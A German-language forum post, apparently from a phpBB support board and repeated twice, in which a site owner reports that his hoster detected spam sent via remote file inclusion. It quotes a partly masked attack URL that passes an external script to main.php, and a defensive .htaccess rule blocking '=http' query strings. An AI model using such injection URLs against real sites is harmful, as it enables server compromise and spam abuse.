Spammen über PHPBB - index.php (v 2.0.21)
Verfasst: 27.10.2006 00:00
hallo,
ich durfte mich heute über folgende mail von meinem Hoster erfreuen:
Hallo Herr *****
soeben wurden Spammails von Ihrem Account aus verschickt, dies erfolgte durch die Übergabe eines externen Scriptes an Ihre index.php
http://www.*****.***/main.php?site=http://www.geocities.com/<spam-dir>/<Spam-txt>
Um erneuten Spam zu vermeiden wurde in Ihrem Startverzeichnis die .htaccess um folgendes erweitert, das die Übergeben von externen Links an sämtliche Dateien verhindert:
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC]
RewriteRule ^(.*) - [F]
Mit freundlichen Grüßen
wenn ein Entwickler den ganzen Pfad braucht, bitte um eine PM, da ich ja nicht will dass ich eine aufs Dach bekomme, weil ich spam urls poste *g*
(das spammerfile hab ich mir auch geladen, falls es zwischenzeitlich verschwinden sollte, komischerweise lag das in plaintext auf....)
Nun wie geschrieben hab ich schon auf die v 2.0.21 upgedatet, das admin Verzeichnis auch mit einer Passwort - .htaccess vermint, und die install-dirs gibts auch nimmer.
Nun bis auf das mit den zusatzeinträgen weiß ich nicht was ich am Forum machen soll damit sowas nimmer vor kommt.
lg Martin
ich durfte mich heute über folgende mail von meinem Hoster erfreuen:
Hallo Herr *****
soeben wurden Spammails von Ihrem Account aus verschickt, dies erfolgte durch die Übergabe eines externen Scriptes an Ihre index.php
http://www.*****.***/main.php?site=http://www.geocities.com/<spam-dir>/<Spam-txt>
Um erneuten Spam zu vermeiden wurde in Ihrem Startverzeichnis die .htaccess um folgendes erweitert, das die Übergeben von externen Links an sämtliche Dateien verhindert:
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC]
RewriteRule ^(.*) - [F]
Mit freundlichen Grüßen
wenn ein Entwickler den ganzen Pfad braucht, bitte um eine PM, da ich ja nicht will dass ich eine aufs Dach bekomme, weil ich spam urls poste *g*
(das spammerfile hab ich mir auch geladen, falls es zwischenzeitlich verschwinden sollte, komischerweise lag das in plaintext auf....)
Nun wie geschrieben hab ich schon auf die v 2.0.21 upgedatet, das admin Verzeichnis auch mit einer Passwort - .htaccess vermint, und die install-dirs gibts auch nimmer.
Nun bis auf das mit den zusatzeinträgen weiß ich nicht was ich am Forum machen soll damit sowas nimmer vor kommt.
lg Martin